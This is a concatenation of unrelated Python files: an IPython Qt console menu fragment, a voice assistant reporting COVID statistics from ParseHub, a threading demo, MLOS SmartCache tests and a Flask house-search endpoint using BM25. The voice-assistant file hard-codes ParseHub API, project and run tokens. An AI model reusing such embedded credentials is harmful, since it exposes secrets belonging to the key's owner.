menu = QtGui.QMenu(menulabel,self.magic_menu)
self._magic_menu_dict[menuidentifier]=menu
self.magic_menu.insertMenu(self.magic_menu_separator,menu)
return menu
def init_magic_menu(self):
self.magic_menu = self.menuBar().addMenu("&Magic")
self.magic_menu_separator = self.magic_menu.addSeparator()
self.all_magic_menu = self._get_magic_menu("AllMagics", menulabel="&All Magics...")
# This action should usually not appear as it will be cleared when menu
# is updated at first kernel response. Though, it is necessary when
# connecting through X-forwarding, as in this case, the menu is not
# auto updated, SO DO NOT DELETE.
self.pop = QtGui.QAction("&Update All Magic Menu ",
self, triggered=self.update_all_magic_menu)
self.add_menu_action(self.all_magic_menu, self.pop)
# we need to populate the 'Magic Menu' once the kernel has answer at
# least once let's do it immediately, but it's assured to works
self.pop.trigger()
self.reset_action = QtGui.QAction("&Reset",
self,
statusTip="Clear all variables from workspace",
triggered=self.reset_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.reset_action)
self.history_action = QtGui.QAction("&History",
self,
statusTip="show command history",
triggered=self.history_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.history_action)
self.save_action = QtGui.QAction("E&xport History ",
self,
statusTip="Export History as Python File",
triggered=self.save_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.save_action)
self.who_action = QtGui.QAction("&Who",
self,
statusTip="List interactive variables",
triggered=self.who_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_action)
self.who_ls_action = QtGui.QAction("Wh&o ls",
self,
statusTip="Return a list of interactive variables",
triggered=self.who_ls_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_ls_action)
self.whos_action = QtGui.QAction("Who&s",
self,
statusTip="List interactive variables with details",
triggered=self.whos_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.whos_action)
def init_window_menu(self):
self.window_menu = self.menuBar().addMenu("&Window")
if sys.platform == 'darwin':
# add min/maximize actions to OSX, which lacks default bindings.
self.minimizeAct = QtGui.QAction("Mini&mize",
self,
shortcut="Ctrl+m",
statusTip="Minimize the window/Restore Normal Size",
triggered=self.toggleMinimized)
# maximize is called 'Zoom' on OSX for some reason
self.maximizeAct = QtGui.QAction("&Zoom",
self,
shortcut="Ctrl+Shift+M",
statusTip="Maximize the window/Restore Normal Size",
triggered=self.toggleMaximized)
self.add_menu_action(self.window_menu, self.minimizeAct)
self.add_menu_action(self.window_menu, self.maximizeAct)
self.window_menu.addSeparator()
prev_key = "Ctrl+Shift+Left" if sys.platform == 'darwin' else "Ctrl+PgUp"
self.prev_tab_act = QtGui.QAction("Pre&vious Tab",
self,
shortcut=prev_key,
statusTip="Select previous tab",
triggered=self.prev_tab)
self.add_menu_action(self.window_menu, self.prev_tab_act)
next_key = "Ctrl+Shift+Right" if sys.platform == 'darwin' else "Ctrl+PgDown"
self.next_tab_act = QtGui.QAction("Ne&xt Tab",
self,
shortcut=next_key,
statusTip="Select next tab",
triggered=self.next_tab)
self.add_menu_action(self.window_menu, self.next_tab_act)
def init_help_menu(self):
# please keep the Help menu in Mac Os even if empty. It will
# automatically contain a search field to search inside menus and
# please keep it spelled in English, as long as Qt Doesn't support
# a QAction.MenuRole like HelpMenuRole otherwise it will lose
# this search field functionality
self.help_menu = self.menuBar().addMenu("&Help")
# Help Menu
self.intro_active_frontend_action = QtGui.QAction("&Intro to IPython",
self,
triggered=self.intro_active_frontend
)
self.add_menu_action(self.help_menu, self.intro_active_frontend_action)
self.quickref_active_frontend_action = QtGui.QAction("IPython &Cheat Sheet",
self,
triggered=self.quickref_active_frontend
)
self.add_menu_action(self.help_menu, self.quickref_active_frontend_action)
self.guiref_active_frontend_action = QtGui.QAction("&Qt Console",
self,
triggered=self.guiref_active_frontend
)
self.add_menu_action(self.help_menu, self.guiref_active_frontend_action)
self.onlineHelpAct = QtGui.QAction("Open Online &Help",
self,
triggered=self._open_online_help)
self.add_menu_action(self.help_menu, self.onlineHelpAct)
# minimize/maximize/fullscreen actions:
def toggle_menu_bar(self):
menu_bar = self.menuBar()
if menu_bar.isVisible():
menu_bar.setVisible(False)
else:
menu_bar.setVisible(True)
def toggleMinimized(self):
if not self.isMinimized():
self.showMinimized()
else:
self.showNormal()
def _open_online_help(self):
filename="http://ipython.org/ipython-doc/stable/index.html"
webbrowser.open(filename, new=1, autoraise=True)
def toggleMaximized(self):
if not self.isMaximized():
self.showMaximized()
else:
self.showNormal()
# Min/Max imizing while in full screen give a bug
# when going out of full screen, at least on OSX
def toggleFullScreen(self):
if not self.isFullScreen():
self.showFullScreen()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(False)
self.minimizeAct.setEnabled(False)
else:
self.showNormal()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(True)
self.minimizeAct.setEnabled(True)
def close_active_frontend(self):
self.close_tab(self.active_frontend)
def restart_kernel_active_frontend(self):
self.active_frontend.request_restart_kernel()
def interrupt_kernel_active_frontend(self):
self.active_frontend.request_interrupt_kernel()
def toggle_confirm_restart_active_frontend(self):
widget = self.active_frontend
widget.confirm_restart = not widget.confirm_restart
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def update_restart_checkbox(self):
if self.active_frontend is None:
return
widget = self.active_frontend
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def cut_active_frontend(self):
widget = self.active_frontend
if widget.can_cut():
widget.cut()
def copy_active_frontend(self):
widget = self.active_frontend
widget.copy()
def copy_raw_active_frontend(self):
self.active_frontend._copy_raw_action.trigger()
def paste_active_frontend(self):
widget = self.active_frontend
if widget.can_paste():
widget.paste()
def undo_active_frontend(self):
self.active_frontend.undo()
def redo_active_frontend(self):
self.active_frontend.redo()
def reset_magic_active_frontend(self):
self.active_frontend.execute("%reset")
def history_magic_active_frontend(self):
self.active_frontend.execute("%history")
def save_magic_active_frontend(self):
self.active_frontend.save_magic()
def clear_magic_active_frontend(self):
self.active_frontend.execute("%clear")
def who_magic_active_frontend(self):
self.active_frontend.execute("%who")
def who_ls_magic_active_frontend(self):
self.active_frontend.execute("%who_ls")
def whos_magic_active_frontend(self):
self.active_frontend.execute("%whos")
def print_action_active_frontend(self):
self.active_frontend.print_action.trigger()
def export_action_active_frontend(self):
self.active_frontend.export_action.trigger()
def select_all_active_frontend(self):
self.active_frontend.select_all_action.trigger()
def increase_font_size_active_frontend(self):
self.active_frontend.increase_font_size.trigger()
def decrease_font_size_active_frontend(self):
self.active_frontend.decrease_font_size.trigger()
def reset_font_size_active_frontend(self):
self.active_frontend.reset_font_size.trigger()
def guiref_active_frontend(self):
self.active_frontend.execute("%guiref")
def intro_active_frontend(self):
self.active_frontend.execute("?")
def quickref_active_frontend(self):
self.active_frontend.execute("%quickref")
#---------------------------------------------------------------------------
# QWidget interface
#---------------------------------------------------------------------------
def closeEvent(self, event):
""" Forward the close event to every tabs contained by the windows
"""
if self.tab_widget.count() == 0:
# no tabs, just close
event.accept()
return
# Do Not loop on the widget count as it change while closing
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if self.confirm_exit:
if self.tab_widget.count() > 1:
msg = "Close all tabs, stop all kernels, and Quit?"
else:
msg = "Close console, stop kernel, and Quit?"
info = "Kernels not started here (e.g. notebooks) will be left alone."
closeall = QtGui.QPushButton("&Quit", self)
closeall.setShortcut('Q')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
else:
reply = okay
if reply == cancel:
event.ignore()
return
if reply == okay:
while self.tab_widget.count() >= 1:
# prevent further confirmations:
widget = self.active_frontend
widget._confirm_exit = False
self.close_tab(widget)
event.accept()
|
main.py
|
import requests
import json
import pyttsx3
import speech_recognition as sr
import re
import threading
import time
API_KEY= "t1zcRzKZR3q3"
PROJECT_TOKEN= "t1Oa2KH2oM0N"
RUN_TOKEN="txCLmJmi8FwO"
class Data:
def __init__(self, api_key, project_token):
self.api_key = api_key
self.project_token = project_token
self.params = {
"api_key": self.api_key
}
self.data = self.get_data()
def get_data(self):
response = requests.get(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/last_ready_run/data', params=self.params)
data = json.loads(response.text)
return data #to avoid overwriting of data
def get_total_cases(self):
data = self.data['total']
for content in data:
if content['name'] == "Coronavirus Cases:":
return content['value']
def get_total_deaths(self):
data = self.data['total']
for content in data:
if content['name'] == "Deaths:":
return content['value']
return "0"
def get_country_data(self, country):
data = self.data["country"]
for content in data:
if content['name'].lower() == country.lower():
return content
return "0"
def get_list_of_countries(self):
countries = []
for country in self.data['country']:
countries.append(country['name'].lower())
return countries
def update_data(self) :
response = requests.post(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/run', params=self.params)
def poll():
time.sleep(0.1)
old_data = self.data
while True:
new_data = self.get_data()
if new_data != old_data:
self.data = new_data
print("Data updated")
break
time.sleep(5)
t = threading.Thread(target=poll)
t.start()
#inside the thread we constantly ask server for data response n take time so to make sure that i am still
#interacting with the voice assistant and behind the serveis still fetching the updated data so it wont interfare with the process of main()
#when we run threadd it will only take over with the voice assistant part which will take only a few microsec
#it wont waste much time in processing the enitre data
def speak(text):
engine =pyttsx3.init()
engine.say(text)
engine.runAndWait()
def get_audio():
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.listen(source)
said = ""
try:
said = r.recognize_google(audio)
except Exception as e:
print("Exception:", str(e))
return said.lower()
def main():
print("Started Program")
data = Data(API_KEY, PROJECT_TOKEN)
END_PHRASE = "stop"
country_list = data.get_list_of_countries()
#regex pattern to pattern recog.
TOTAL_PATTERNS = {
re.compile("[\w\s]+ total [\w\s]+ cases"):data.get_total_cases,
re.compile("[\w\s]+ total cases"): data.get_total_cases,
re.compile("[\w\s]+ total [\w\s]+ deaths"): data.get_total_deaths,
re.compile("[\w\s]+ total deaths"): data.get_total_deaths
}
COUNTRY_PATTERNS = {
re.compile("[\w\s]+ cases [\w\s]+"): lambda country: data.get_country_data(country)['total_cases'],
re.compile("[\w\s]+ deaths [\w\s]+"): lambda country: data.get_country_data(country)['total_deaths'],
}
UPDATE_COMMAND = "update"
while True:
print("Listening...")
text = get_audio()
print(text)
result = None
for pattern, func in COUNTRY_PATTERNS.items():
if pattern.match(text):
words = set(text.split(" "))
for country in country_list:
if country in words:
result = func(country)
break
for pattern, func in TOTAL_PATTERNS.items():
if pattern.match(text):
result = func()
break
if text == UPDATE_COMMAND:
result = "Data is being updated. This may take a moment!"
data.update_data()
if result:
speak(result)
if text.find(END_PHRASE) != -1: # stop loop
print("Exit")
break
main()
|
threading_join.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Lyon
# import threading
# import time
# class MyThread(threading.Thread):
# def __init__(self,name):
# threading.Thread.__init__(self)
# self.name = name
#
# def run(self):
# print("I am %s" % self.name)
# time.sleep(2)
#
# if __name__ == '__main__':
# t1 = MyThread('Lyon')
# t2 = MyThread('Kenneth')
# t1.start()
# t1.join()
# t2.start()
# t2.join()
# print("主线程")
import threading
import time
def run(name):
print("I am %s" % name)
time.sleep(2)
print("When I'm done, I'm going to keep talking...")
if __name__ == '__main__':
lyon = threading.Thread(target=run, args=('Lyon',))
kenneth = threading.Thread(target=run, args=('Kenneth',))
lyon.start()
lyon.join()
kenneth.start()
kenneth.join()
print("I was the main thread, and I ended up executing")
|
TestE2EScenarios.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import logging
from threading import Thread
import time
import unittest
from mlos.Logger import create_logger
from mlos.Examples.SmartCache import SmartCacheWorkloadGenerator, SmartCache
from mlos.Examples.SmartCache.TelemetryAggregators.WorkingSetSizeEstimator import WorkingSetSizeEstimator
from mlos.Mlos.Infrastructure import CommunicationChannel, SharedConfig
from mlos.Mlos.SDK import mlos_globals, MlosGlobalContext, MlosExperiment, MlosAgent
from mlos.Mlos.SDK.CommonAggregators.Timer import Timer
class TestE2EScenarios(unittest.TestCase):
""" Tests aggregators based on the timer.
"""
@classmethod
def setUpClass(cls) -> None:
mlos_globals.init_mlos_global_context()
cls.logger = create_logger('TestE2EScenarios')
cls.logger.level = logging.INFO
cls.mlos_agent = MlosAgent(
logger=cls.logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config
)
cls.mlos_agent_thread = Thread(target=cls.mlos_agent.run)
cls.mlos_agent_thread.start()
mlos_globals.mlos_global_context.start_clock()
cls.mlos_agent.add_allowed_component_type(SmartCache)
cls.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
@classmethod
def tearDownClass(cls) -> None:
cls.mlos_agent.stop_all()
mlos_globals.mlos_global_context.stop_clock()
def test_timer(self):
""" Tests if the timer works with required precision.
:return:
"""
timeout_ms = 100
epsilon_ms = 10
def _process_clock_event(elapsed_time_ms):
self.assertTrue(elapsed_time_ms + epsilon_ms > timeout_ms)
self.logger.debug(f"Processed clock event. Elapsed time: {elapsed_time_ms}")
timer = Timer(
timeout_ms=timeout_ms,
observer_callback=_process_clock_event,
epsilon_ms=epsilon_ms
)
timer_experiment = MlosExperiment(
smart_component_types=[],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(timer_experiment)
time.sleep(1)
self.mlos_agent.stop_experiment(timer_experiment)
def test_setting_random_configs_for_smart_cache_workload(self):
workload_duration_s = 1
# Let's launch the smart_cache_workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
def _set_random_workload_configuration(elapsed_time_ms):
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
def test_setting_random_configs_for_smart_cache(self):
workload_duration_s = 5
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
smart_cache_workload_thread.join()
self.mlos_agent.stop_experiment(smart_cache_experiment)
def test_setting_random_configs_for_smart_cache_and_for_smart_cache_workload(self):
""" Enables two experiments at once: one to set the cache parameters, the other to set the workload parameters.
:return:
"""
workload_duration_s = 2
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
##################################################################################
# Let's configure the expriment changing the workload configuration
def _set_random_workload_configuration(elapsed_time_ms):
# First check that the config has been consumed
#if smart_cache_workload.current_config.values != self.current_workload_config_values:
# print("Put breakpoint here.")
#self.assertTrue(smart_cache_workload.current_config.values == self.current_workload_config_values)
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
workload_timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[workload_timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
##################################################################################
# Now let's configure the smart cache tuning experiment
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(smart_cache_experiment)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
smart_cache_workload_thread.join()
all_registered_mlos_objects = set((component_type, runtime_attributes) for component_type ,runtime_attributes in self.mlos_agent.enumerate_active_smart_components())
self.assertTrue(
(smart_cache_workload.mlos_object.owning_component_type, smart_cache_workload.mlos_object.owning_component_runtime_attributes)
in all_registered_mlos_objects
)
del smart_cache_workload
self.mlos_agent.stop_all()
all_registered_mlos_objects = set(mlos_object for mlos_object in self.mlos_agent.enumerate_active_smart_components())
if len(all_registered_mlos_objects) != 0:
print("Put breakpoint here")
self.assertTrue(len(all_registered_mlos_objects) == 0)
|
houseList.py
|
import random
import threading
import joblib
from flask import Blueprint, render_template, session, flash, redirect, request, url_for
from src.extension import db
from src.Models.Houses import House
from src.Models.Targets import Targets
from src.Models.Users import User
from src.Utility import enumMachine
import math
import re
# from time import time
import time
import os
import json
from src.blueprints.search_community import searchCommunity
from src.blueprints.search_community import data
houseList = Blueprint('HouseList', __name__)
###################################################
# 3. 列表接口
############################################
@houseList.route("/test", methods=['GET', 'POST'])
def test():
return 0
def preProcessing(document):
print("This is the first time to run. The program needs document processing. Please wait a moment")
N = 0 # Calculate the number of documents in the collection
avg_doclen = 0 # The average length of a document in the collection, will be used later
comp = re.compile('[^a-z^0-9^ ]') # A compiler to remove the punctuation
Ni = {} # Number of documents contains term i, key is the term, value is Ni
Fij = {} # Frequency of term i in document j, key is the document number, value is a dict
k = 1 # k for BM25
b = 0.75 # b for BM25
# t1 = time()
for docs in document.values():
temp_l = []
for v in docs.values():
if get_keys(docs, v)[0] != 'collected' and get_keys(docs, v)[0] != 'imgUrl' and get_keys(docs, v)[
0] != 'houseId':
temp_l.append(str(v))
N += 1
line = ' '.join(temp_l)
# line = comp.sub(' ', line.lower())
line = line.lower()
line = line.replace("-", ",")
line = line.replace("_", ",")
line = line.replace(" ", ",")
line = line.replace("|", ",")
line_split = line.split(",")
print(line_split)
newDict = {} # Store the frequency of terms in this document, key is the term, value is the frequency
for elements in line_split:
avg_doclen += 1 # Calculate the number of terms in the document collection
if elements in newDict: # Calculate the frequency of this term in this document
newDict[elements] += 1
else:
newDict[elements] = 1
for terms in newDict: # Calculate the number of documents contains this term
if terms not in Ni:
Ni[terms] = 1
else:
Ni[terms] += 1
Fij[get_keys(document, docs)[0]] = newDict
# t2 = time()
for terms in Ni.keys():
Ni[terms] = math.log2(
(N - Ni[terms] + 0.5) / (Ni[terms] + 0.5)) # Calculate the value for future calculations
avg_doclen = avg_doclen / N # Calculate the average doc length
index = {} # Store the BM25 value of every term in every document, key is the document name, value is the BM25_dict
for keys in Fij.keys():
BM25_dict = {} # Store the BM25 value of each term, key is the term, value is BM25 value
lenDj = calculateLength(Fij[keys])
for elements in Fij[keys].keys():
BM25 = (((Fij[keys])[elements] * (1 + k)) / (
(Fij[keys])[elements] + k * ((1 - b) + (b * lenDj) / avg_doclen))) * Ni[elements]
BM25_dict[elements] = BM25
index[keys] = BM25_dict
js = json.dumps(index) # use json to store the dict in the txt file
with open("home_search.txt", "w") as f:
f.write(js)
# t3 = time()
print("Document processing completed")
def calculateLength(dict): # calculate the length of a document
length = 0
for values in dict.values():
length += values
return length
def get_keys(d, value):
return [k for k, v in d.items() if v == value]
####################################
# 3.1. 获取列表数据接口: ###
####################################
# 输入: timeRange Array 发布时间区间 内部为字符串日历时间:"yyyy-mm-dd"
# priceRange Array 价格区间 内部为字符串格式价格:"1000000"
# otherFeatures Object 其他特征包装变量 对象内部特征根据配置静态文件中字典解析
# pageNum String 当前页数 分页用数据
# pageSize String 每页个数 分页用数据
# searchString String 搜索字符串 bm25搜索
# 输出: "success": 1,
# "data": {
# "total": ""//数据总数,分页用 *****新增*****
# "houseList":[//房源数据列表,注意数量与参数中每页信息数相同
# {
# "imgUrl":"",//房源图片url
# "title":""//房源标题
# "describe":""//房源描述
# "position":""//房源地址(包含region和district,后端连接)
# "coordinate":[]//房源经纬坐标(用于地图展示)
# "houseId":""//房源Id
# "totalPrice":""//房源总计 *****新增*****
# "unitPrice":""//房源单价 *****新增*****
# "collected": true//布尔值,是否已被收藏,仅是对这个用户自身 *****新增*****
# },
# ]
# },
#
# 变量解释: argDict: 请求用的参数字典
@houseList.route("/getHouseList", methods=['GET', 'POST'])
def getHouse():
global argdict # get the parameter from the front
if request.method == 'POST':
timeRange = None
totalPriceRange = None
unitPriceRange = None
area = None
district = None
houseStructrue = None
decoration = None
direction = None
heating = None
elevator = None
pageNum = None
pageSize = None
searchString = None
userId = request.json.get('userId')
timeRange = request.json.get('timeRange')
if timeRange == [0, 0]:
timeRange = [0, 9999990]
totalPriceRange = request.json.get('totalPriceRange')
totalPriceRange = [int(x) for x in totalPriceRange]
if totalPriceRange == [0, 0]:
totalPriceRange = [0, 999999999]
totalPriceRange[0] = int(totalPriceRange[0] / 10000)
totalPriceRange[1] = int(totalPriceRange[1] / 10000)
unitPriceRange = request.json.get('unitPriceRange')
unitPriceRange = [int(x) for x in unitPriceRange]
if unitPriceRange == [0, 0]:
unitPriceRange = [0, 99999999]
area = request.json.get('area')
print(area)
area = [int(x) for x in area]
if area == [0, 0]:
area = [0, 99999999]
districtEnum = request.json.get('district')
if districtEnum == []:
districtEnum = enumMachine.District.values
district = []
for item in districtEnum:
district.append(enumMachine.District.enum2field(item))
houseStructrueEnum = request.json.get('houseStructure')
if houseStructrueEnum == []:
houseStructrueEnum = enumMachine.House_structrue.values
print(houseStructrueEnum)
houseStructrue = []
for item in houseStructrueEnum:
houseStructrue.append(enumMachine.House_structrue.enum2field(item))
direction_listEnum = request.json.get('direction')
if direction_listEnum == []:
direction_listEnum = enumMachine.Direction.values
direction_list = []
for item in direction_listEnum:
direction_list.append(enumMachine.Direction.enum2field(item))
decorationEnum = request.json.get('decoration')
if decorationEnum == []:
decorationEnum = enumMachine.Ddecoration.values
decoration = []
for item in decorationEnum:
decoration.append(enumMachine.Ddecoration.enum2field(item))
heatingEnum = request.json.get('heating')
if heatingEnum == []:
heatingEnum = enumMachine.Heating.values
heating = []
for item in heatingEnum:
heating.append(enumMachine.Heating.enum2field(item))
elevatorEnum = request.json.get('elevator')
if elevatorEnum == []:
elevatorEnum = enumMachine.Elevator.values
elevator = []
for item in elevatorEnum:
elevator.append(enumMachine.Elevator.enum2field(item))
pageNum = request.json.get('pageNum')
pageSize = request.json.get('pageSize')
searchString = request.json.get('searchString')
argdict = {
"timeRange": timeRange,
"totalPriceRange": totalPriceRange,
"unitPriceRange": unitPriceRange,
"area": area,
"district": district,
"houseStructrue": houseStructrue,
"direction": direction_list,
"decoration": decoration,
"heating": heating,
"elevator": elevator,
"pageNum": pageNum,
"pageSize": pageSize,
"searchString": searchString
}
# 返回房子模型的数组
houseList = []
direction = {}
# #process the drection
# direction=argdict[direction]
direction = {
"west": "west" if "west" in direction_list else "no",
"east": "east" if "east" in direction_list else "no",
"south": "south" if "south" in direction_list else "no",
"north": "north" if "north" in direction_list else "no",
"southwest": "southwest" if "southwest" in direction_list else "no",
"southeast": "southeast" if "southeast" in direction_list else "no",
"northeast": "northeast" if "northeast" in direction_list else "no",
"northwest": "northwest" if "northwest" in direction_list else "no"
}
def filterDirection(l1, l2):
l1.append('no')
for element in l2:
if element not in l1:
return False
return True
def convertListToEnum(li):
print("strart to convert ")
for e in li:
e['position'] = enumMachine.Region.field2enum(e['position'])
e['district'] = enumMachine.District.field2enum(e['district'])
return li
# print(direction)
# print(request.json)
print("The filter requirement is:")
print(argdict)
print('searchString: ', searchString)
houses = []
total = 0
document = {}
document_id = 0
houses = House.query.filter().all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
#####Search Engine
stopwords = set() # A set to store the stopwords
with open("stopwords.txt") as f:
for line in f:
line = line[:-1] # Remove the /n in the back of the line
stopwords.add(line)
if not os.path.exists(
"home_search.txt"): # The following code are for indexing, will only run on the first run.
preProcessing(document)
######### indexing finish
file = open('home_search.txt', 'r') # open the index file and store to a dictionary
# t4 = time()
js = file.read()
index = json.loads(js)
# t5 = time()
print("done")
query = searchString
query = query.lower()
similarity = {} # A dict store the similarity, the key is the document id, the value is the score
query_term = [] # A list store the stemmed terms in the query
for elements in query.split(" "):
if elements not in stopwords: # remove stopwords
query_term.append(elements)
for documents in index: # calculate similarity score for every document
score = 0
for terms in query_term:
if terms in index[documents]:
score += (index[documents])[terms]
similarity[documents] = score
result = sorted(similarity.items(), key=lambda x: x[1], reverse=True) # Sort by similarity
rank = 1
for r in result: # Print top 15 results
# print("rank: ", rank, "document: ", document[int(r[0])], "score: ", r[1])
if r[1] > 0 or searchString == '':
houseList.append(document[int(r[0])])
rank += 1
# if rank == 16:
# break
p_max = len(houseList)
total = p_max
print(p_max)
# p_start = (int(pageNum) - 1) * int(pageSize)
# p_end = p_start + 10
# if p_end > p_max:
# p_end = p_max
# houseList = houseList[p_start:p_end]
filter_List = []
if direction_listEnum == enumMachine.Direction.values:
for h in houseList:
if h['title'] != '':
if (argdict['totalPriceRange'][0] <= int(h['totalPrice']) <= argdict['totalPriceRange'][1] and
argdict['area'][0] <= float((h['describe'].split('|')[1]).split(' ')[0]) <= argdict['area'][
1] and
argdict['unitPriceRange'][0] <= int(h['unitPrice']) <= argdict['unitPriceRange'][1] and
h['district'] in (argdict["district"]) and
(h['describe'].split('|')[4]).split(' ')[1] in (argdict['houseStructrue']) and
h['otherInfo'].split('|')[0] in (argdict["decoration"]) and
h['otherInfo'].split('|')[1] in (argdict["heating"]) and
h['otherInfo'].split('|')[2] in (argdict["elevator"])
):
filter_List.append(h)
total = len(filter_List)
print("filter List\n")
print(filter_List)
print(total, '111')
# total=House.query.filter(House.price >argdict['totalPriceRange'][0],House.price<argdict['totalPriceRange'][1],
# House.floor_area >argdict['area'][0],House.floor_area<argdict['area'][1],
# House._unit_price>argdict['unitPriceRange'][0],House._unit_price<argdict['unitPriceRange'][1],
# House.District.in_(argdict["district"]),
# House.House_structure.in_(argdict['houseStructrue']),
#
# # House.east==direction["east"],House.west==direction["west"],House.east_north==direction["northeast"],House.east_south==direction["southeast"]
# # ,House.north==direction["north"],House.south==direction["south"],House.west_south==direction["southwest"],House.east_south==direction["southwest"]
# # ,
# House.Interior_design.in_(argdict["decoration"]),
# House.heating.in_(argdict["heating"])
# ,House.elevator.in_(argdict["elevator"])
# ).count()
# 从数据库查找数据 在价格区间内的数据
else:
for h in houseList:
if h['title'] != '':
if (argdict['totalPriceRange'][0] <= int(h['totalPrice']) <= argdict['totalPriceRange'][1] and
argdict['area'][0] <= float((h['describe'].split('|')[1]).split(' ')[0]) <= argdict['area'][
1] and
argdict['unitPriceRange'][0] <= int(h['unitPrice']) <= argdict['unitPriceRange'][1] and
h['district'] in (argdict["district"]) and
filterDirection((h['describe'].split('|')[2]).split(' '), argdict['direction']) and
(h['describe'].split('|')[4]).split(' ')[1] in (argdict['houseStructrue']) and
h['otherInfo'].split('|')[0] in (argdict["decoration"]) and
h['otherInfo'].split('|')[1] in (argdict["heating"]) and
h['otherInfo'].split('|')[2] in (argdict["elevator"])
):
filter_List.append(h)
total = len(filter_List)
print(total, '222')
p_start = (int(pageNum) - 1) * int(pageSize)
p_end = p_start + 10
if p_end > total:
p_end = total
filter_List = filter_List[p_start:p_end]
user = User.query.filter(User.id == userId).first()
houses = user.collections
hids = []
for i in houses:
hids.append(i.id)
for item in filter_List:
hid = item['houseId']
if hid in hids:
item['collected'] = "true"
else:
item["collected"] = "false"
# convertListToEnum(filter_List)
# houses=House.query.filter(House.price >argdict['totalPriceRange'][0],House.price<argdict['totalPriceRange'][1],
# House.floor_area >argdict['area'][0],House.floor_area<argdict['area'][1],
# House._unit_price>argdict['unitPriceRange'][0],House._unit_price<argdict['unitPriceRange'][1],
# House.District.in_(argdict["district"]),
# House.House_structure.in_(argdict['houseStructrue']),
# #
# House.east==direction["east"],House.west==direction["west"],House.east_north==direction["northeast"],House.east_south==direction["southeast"]
# ,House.north==direction["north"],House.south==direction["south"],House.west_south==direction["southwest"],House.east_south==direction["southwest"]
# ,
# House.Interior_design.in_(argdict["decoration"]),
# House.heating.in_(argdict["heating"])
# ,House.elevator.in_(argdict["elevator"])
# ).all()
